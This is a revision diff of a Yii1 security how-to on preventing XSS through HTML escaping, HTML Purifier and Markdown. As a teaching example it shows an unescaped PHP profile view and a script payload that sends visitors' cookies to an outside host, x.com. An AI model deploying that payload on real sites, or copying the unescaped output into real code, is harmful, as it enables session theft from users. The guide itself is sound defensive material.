Difference between #15 and #16 of
How to write secure Yii1 applications

Revision #16 has been created by François Gannaz on Oct 30, 2013, 9:01:19 AM with the memo:

Better doc on HTML escaping
« previous (#15) next (#17) »

Changes

Title unchanged

How to write secure Yii applications

Category unchanged

How-tos

Yii version unchanged

Tags unchanged

security, authorization, authentication, XSS, SQL injection

Content changed

[...]
### Example

Here is a extract of a view. The page just shows a user profile.
~~~
[html]
< h2>Profile of <?php echo $user->name ?></h2> Other unfiltered and unsecure outputs: <a href="/posts?name=<?php echo $user->login ?>" title='<?php echo $user->name ?>'>See my posts</a> ~~~ Now sWhy is this dangerous? Suppose the user's name is: Joe<script>document.write('<img src="http://x.com/save.php?cookie='+getCookie()+'" />');function getCookie(){...}</script> Then everyone that consults this profile will send an HTTP request for an external image, and this request will contain data describing the visitor's cookies. This is an XSS attack.

PHP provides several functions that protect the output.
[...]
$purifier = new CHtmlPurifier();
$purifier->options = array(
'HTML.Allowed', => 'p,a[href],b,i',
);
foreach (Comment::model()->findAll() as $comment) {
[...]
```

Allowing the user to enter HTML text can be useful, especially with Rich Text Editors like TinyMCE or FcCkEditor, but you may alsoinstead **consider using templating languages**, like Markdown or wiki syntax. Regarding security, the benefit is that the application converts to HTML, so the risk of XSS is low.  
```php 
<div class="comment">
 
<?php
 
$md = new CMarkdownParser();
 
echo "<div>" . $md->transform($comment) . "</div>";
 
?>
 
</div>
 
```
 
 
##### To go further: * [HTML Purifier's doc](http://htmlpurifier.org/docs). The end-user documentation contains a few thematic tutorials, like ["Customize"](http://htmlpurifier.org/docs/enduser-customize.html). The [Configuration Reference](http://htmlpurifier.org/live/configdoc/plain.html) lists all the options you can use with [CHtml::Purifier](http://www.yiiframework.com/doc/api/1.1/CHtmlPurifier) but it lacks examples. * [CMarkdown](http://www.yiiframework.com/doc/api/1.1/CMarkdown/) and [CMarkdownParser](http://www.yiiframework.com/doc/api/1.1/CMarkdownParser/)


### Special cases: URLs, CSS, etc

#### URL
[...]
80 0
114 followers
Viewed: 309 905 times
Version: 1.1
Category: How-tos
Tags: authentication, authorization, security, SQL injection, XSS
Written by: François Gannaz
Last updated by: François Gannaz
Created on: Nov 22, 2011
Last updated: 2 years ago
Update Article
Revert to #15 | Revert to #16

Revisions

View all history